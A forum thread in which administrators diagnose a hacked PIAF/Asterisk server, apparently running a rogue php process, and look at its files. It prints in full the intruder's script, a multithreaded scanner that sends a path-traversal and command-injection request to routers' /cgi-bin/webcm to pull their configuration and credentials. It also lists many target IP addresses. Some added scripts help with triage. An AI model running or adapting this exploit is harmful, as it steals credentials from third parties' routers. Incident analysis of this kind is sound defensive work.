The PHP process is crashing Asterisk, taking 100% CPU

Folks,

We have a client with a PIAF install.

PIAF Installed Version = 2.0.6.3 under HARDWARE
FreePBX Version = 2.9.0.15
Running Asterisk Version = 1.8.19.1
Asterisk Source Version = 1.8.19.1

They have a somewhat complicated setup there; they are using Aastra phones. The system was working fine until last week; since then we have noticed that the phones all of a sudden lost registration to the server.

We were checking the logs and it looks like Asterisk is crashing. Something we noticed is that PHP is taking 100% of the CPU, and maybe that is crashing Asterisk.

Here is the top result:

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
7701 root 25 0 49896 32m 6352 R 99.2 1.6 583:45.53 php
18273 root 25 0 54484 36m 6360 R 99.2 1.8 878:25.15 php
3307 asterisk 15 0 13184 9252 1864 S 1.0 0.4 0:52.55 op_server.pl

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
7701 root 25 0 49896 32m 6352 R 100.0 1.6 584:03.56 php
18273 root 25 0 54484 36m 6360 R 99.8 1.8 878:43.15 php

Any advice?

Thank you in advance.

You would need to know the actual processes:

ps aux|grep php

Hey Dicko,

Thanks for the quick response.

Here is the result of ps aux|grep php:

root 18273 92.1 1.8 54484 37468 ? R Nov04 1089:09 php imgu.php

Looks like imgu.php is the issue.

I would look for this file:

locate imgu.php

And see what it is… It seems you are all sorts of outdated; you may have been hacked…

You should probably run:

updatedb;locate imgu.php
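The replies above do the triage by hand: find the php processes, see what script each one is running, then locate the file. The script below is an added example (not from the thread or from the PIAF/FreePBX projects) that automates that first pass over `ps aux` output. The directory allow-list, the CPU-minutes threshold and the sample `ps` lines are constructed assumptions for the example, not facts from the page; adjust the allow-list to where PHP legitimately runs on your box.

```bash
#!/usr/bin/env bash
# Added example: triage php processes from `ps aux` output.
# Assumed allow-list of directories from which PHP is expected to run on a
# PIAF/FreePBX box (a guess for the example, not taken from the thread).
KNOWN_PHP_DIRS="/var/www/html /var/lib/asterisk /usr/share/pear"
# Assumed threshold: more than this many CPU minutes is worth a look.
CPU_MINUTES_LIMIT=60

# Read `ps aux` lines on stdin and print one line per php process:
#   <verdict> pid=<pid> cpu=<%cpu> time=<cputime> script=<script>
# A process is SUSPICIOUS when its script argument is a bare/relative name
# or lies outside KNOWN_PHP_DIRS, or when its CPU time exceeds the limit.
triage_php_processes() {
  awk -v dirs="$KNOWN_PHP_DIRS" -v limit="$CPU_MINUTES_LIMIT" '
    BEGIN { n = split(dirs, known, " ") }
    # ps aux columns: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND...
    NF >= 11 {
      cmd = $11; sub(/.*\//, "", cmd)       # basename, so /usr/bin/php also matches
      if (cmd != "php") next
      pid = $2; cpu = $3; cputime = $10
      script = ($12 != "" ? $12 : "(none)")
      # TIME is mm:ss or hh:mm:ss (assumed; day-prefixed forms are not handled)
      parts = split(cputime, t, ":")
      minutes = (parts == 3) ? t[1] * 60 + t[2] : t[1]
      verdict = "SUSPICIOUS"
      for (i = 1; i <= n; i++)
        if (index(script, known[i] "/") == 1) verdict = "OK"
      if (minutes + 0 > limit + 0) verdict = "SUSPICIOUS"
      printf "%s pid=%s cpu=%s time=%s script=%s\n", verdict, pid, cpu, cputime, script
    }'
}

# On a live box, resolve where a flagged PID really runs from (cwd and exe
# from /proc), which is what "php imgu.php" with no path leaves unanswered.
describe_pid() {
  pid=$1
  printf 'pid %s cwd=%s exe=%s\n' "$pid" \
    "$(readlink "/proc/$pid/cwd" 2>/dev/null || echo '?')" \
    "$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')"
}

# Constructed sample in the shape of the `ps aux|grep php` line in the thread;
# the second and third rows are made up for the example.
SAMPLE_PS='root      18273 92.1  1.8  54484 37468 ?  R  Nov04 1089:09 php imgu.php
asterisk   2210  0.3  0.9  40120 18220 ?  S  Nov04    0:41 php /var/www/html/admin/foo.php
root       7701 99.2  1.6  49896 32000 ?  R  Nov03  583:45 php /tmp/.x/imgu.php'

# Live use:  ps aux | triage_php_processes
# Offline demonstration on the constructed sample:
printf '%s\n' "$SAMPLE_PS" | triage_php_processes
```

On the sample the first and third rows come back SUSPICIOUS (relative script name and a script under /tmp, both with hours of CPU) and the second comes back OK. Run `describe_pid 18273` on the live host to see the working directory the bare `imgu.php` was resolved from before deciding what to remove.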

The file is located at:

/etc/imgu/imgu.php

and here is the content of the file. Do you see something strange?

<?php
   set_time_limit(0);
   error_reporting(E_ALL ^ E_NOTICE);
   $file = file("ar7.txt");
   $threads = 100;

   function exabod($content,$start,$end){
        $r = explode($start, $content);
        if (isset($r[1])){
            $r = explode($end, $r[1]);
            return $r[0];
        }
        return "";
    }


for($k=0;$k<count($file);$k+=$threads) {
          $mh = curl_multi_init();
          $handles = array();
          $end = $k+$threads;


$end = $k+$threads;

for($i=$k;$i<$end;$i++) {
    $ip = trim($file[$i]);

    if(@fsockopen($ip, 443, $errno, $errstr, 0.3)) {

              $url = "https://".$ip."/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26 allcfgconv -C ar7 -c -o - ../../../../../var/flash/ar7.cfg%26";

          }

          else {
                  continue;
                }


                 $ch = curl_init();


          curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
          curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
          curl_setopt($ch, CURLOPT_URL, $url);
          curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE );
          curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1");
          curl_setopt($ch, CURLOPT_HTTPHEADER,array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language: en-us,en;q=0.5','Accept-Charset: ISO-88$
          curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
          curl_setopt($ch, CURLOPT_TIMEOUT, 3);
          curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);

       curl_setopt($ch, CURLOPT_TIMEOUT, 3);
          curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2);


    curl_multi_add_handle($mh,$ch);


    $ips2[] = $ip;
    $handles[] = $ch;
  }


 $running=null;
  do
  {
    curl_multi_exec($mh,$running);
  } while ($running > 0);
   echo"
[-] >>>>> ".$end." <<<<<
";

  for($j=0;$j<count($handles);$j++)
  {
            $content = curl_multi_getcontent($handles[$j]);
             if (stristr($content,"boxusers")){
        $content2 = exabod($content, "boxusers", "// EOF");
$rimgx = "".$ips2[$j]."";
$abl="admx/".$rimgx."-3as-user.conf";
$fp2 = fopen("$abl","w");
fwrite($fp2, $content2);
fclose($fp2);

echo"
[+] ".$rimgx." - DONE
";
}


             curl_multi_remove_handle($mh,$handles[$j]);


  }

  unset($ips2);

  curl_multi_close($mh);
}


?>

Ok inquiring minds and all that jazz…

What is in /etc/imgu/ar7.txt?

Hey jfinstrom,

I cat'ed the file and it is showing a bunch of IP addresses. Here are some of them:

91.0.175.61
91.0.82.61
91.0.121.43
91.0.165.49
91.0.75.64
91.0.47.203
91.0.140.13
91.0.148.122
91.0.149.114
91.0.75.35
91.0.79.241
91.0.221.227
91.0.59.17
91.0.99.103
91.0.16.96
91.0.82.36
91.0.246.238
91.0.139.196
91.0.187.158
91.0.140.245
91.0.71.73
91.0.1.25
91.0.233.88
91.0.247.9
91.0.153.229
91.0.167.218
91.0.15.133
91.0.171.244
91.0.124.179
91.0.240.171
91.0.131.164
91.0.30.123
91.0.227.187
91.0.190.40
91.0.79.127
91.0.240.21
91.0.215.211
91.0.167.241
91.0.161.220
91.0.19.179
91.0.16.13
91.0.231.177
91.0.70.179
91.0.195.165
91.0.77.84
91.0.138.234
91.0.75.86
91.0.137.213
91.0.149.83
91.0.144.107
91.0.146.23

What is this imgu.php file for? Can I delete it or recreate it?

You have been hacked. I would start with a fresh install. Seems you got hacked on one of the exploits. I am curious as you state you use PBXiaF. Have you disabled their apache auth mechanism that makes you use their maint login for everything?

Sorry, there are not only IPs (or that is what I think they are), because I'm also seeing this type of numbers:

91.31 86.104
911.18120.109
918.12126.57
91.10241.66
912.972.219
911.2821.33
915.11161.207
919.17172.221
910.10234.8
917.18180.176
912.5885.229
917.16205.140
917.13195.213
91.198209.184
910.15121.34
915.99160.73
914.1950.187
918.10250.29
913.2199.199
918.1483.201
917.1088.157
910.11181.155
912.17109.245
91.110132.113
919.17184.1
91.22273.171
912.10222.152
910.56172.55
913.73140.72
913.64221.123
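The poster is unsure which lines of the recovered target list are addresses at all. The script below is an added example (not from the thread) that classifies each line of a file like /etc/imgu/ar7.txt as a well-formed IPv4 address or not and summarises the /16 prefixes the valid entries fall in, so the list can be handed to the affected network's abuse contact with an accurate count instead of being judged by eye. The sample list is constructed for the example from a handful of lines quoted above; malformed lines are only reported, not interpreted.

```bash
#!/usr/bin/env bash
# Added example: classify lines of a recovered IP list (e.g. /etc/imgu/ar7.txt).
# Prints MALFORMED <line> for anything that is not a dotted-quad IPv4 address,
# PREFIX <a.b.0.0/16> <count> for each /16 seen, and a SUMMARY line.
classify_ip_list() {
  awk '
    function is_ipv4(s,   o, n, i) {
      n = split(s, o, ".")
      if (n != 4) return 0
      for (i = 1; i <= 4; i++)
        if (o[i] !~ /^[0-9]+$/ || o[i] + 0 > 255) return 0
      return 1
    }
    {
      sub(/\r$/, "")                      # tolerate CRLF line endings
      gsub(/^[ \t]+|[ \t]+$/, "")         # trim surrounding whitespace only
      if ($0 == "") next
      if (is_ipv4($0)) {
        valid++
        split($0, o, ".")
        prefix[o[1] "." o[2] ".0.0/16"]++
      } else {
        invalid++
        print "MALFORMED " $0
      }
    }
    END {
      for (p in prefix) print "PREFIX " p " " prefix[p]
      printf "SUMMARY valid=%d malformed=%d\n", valid + 0, invalid + 0
    }'
}

# Constructed sample: three address lines and two of the odd lines from the
# thread, so both branches are exercised.
SAMPLE_LIST='91.0.175.61
91.0.82.61
91.31 86.104
911.18120.109
91.0.121.43'

# Live use:  classify_ip_list < /etc/imgu/ar7.txt
printf '%s\n' "$SAMPLE_LIST" | classify_ip_list
```

On the sample this reports the two odd lines as MALFORMED, one PREFIX line for 91.0.0.0/16 with a count of 3, and `SUMMARY valid=3 malformed=2`. The whole-file counts are what belong in an abuse report; the malformed lines are worth keeping with the rest of the evidence rather than cleaning up.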

No, tonyclewis,

I installed this PIAF a long time ago, and I don't remember disabling anything.

How can I check that?